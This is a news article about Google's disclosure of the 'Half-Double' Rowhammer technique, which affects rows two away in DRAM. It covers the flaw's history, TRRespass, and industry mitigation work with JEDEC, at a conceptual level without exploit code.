Rowhammer is a known vulnerability in DRAM through which multiple access requests to one memory address can allow you to modify the contents of other memory addresses. The breach was first discussed in 2014 and affected the chip that was mainstream at that time, which is DDR3. Google also published a working exploit in 2015.
Essentially, the vulnerability exists because of electrical coupling phenomenon in silicon chips which bypasses software- and hardware-based protection. To defend against this flaw, many DRAM manufacturers implemented logic in their chips that detected these illegal accesses and then retroactively blocked them. However, even with DDR4 and newer memory chips, Rowhammer can still be exploited through methods like TRRespass.
Now, Google has disclosed a new Rowhammer technique dubbed "Half-double" which is much more dangerous than the vanilla version. While the latter allowed you to access one adjacent row if you repeatedly accessed one memory address, Google has demonstrated that it can even go beyond this by one more row, although with reduced potency. That said, it has highlighted that it may be possible to access rows which are even farther.
During it's research, when the company accessed memory address "A" a large number of times, it was not only able to access address "B" dozens of times but also managed to attack address "C". This is demonstrated in the graphic below.
Google went on to say that:
Unlike TRRespass, which exploits the blind spots of manufacturer-dependent defenses, Half-Double is an intrinsic property of the underlying silicon substrate. This is likely an indication that the electrical coupling responsible for Rowhammer is a property of distance, effectively becoming stronger and longer-ranged as cell geometries shrink down. Distances greater than two are conceivable.
Overall, the vulnerability is quite significant because it enables a malicious piece of code to escape its sandbox environment and potentially take over the system, in the worst case. As such, Google is working with industry partners such as JEDEC, which is a semiconductor engineering trade organization, to figure out potential solutions. The firm has also published two documents for some mitigations techniques which you can view here and here.
Google hopes that by disclosing its findings publicly, industry partners and researchers will work together towards a more permanent solution. This is a particularly dangerous exploit which allows software to bypass security policies due to the physics of the hardware, so will require wider collaboration across various industries.
6 Comments - Add comment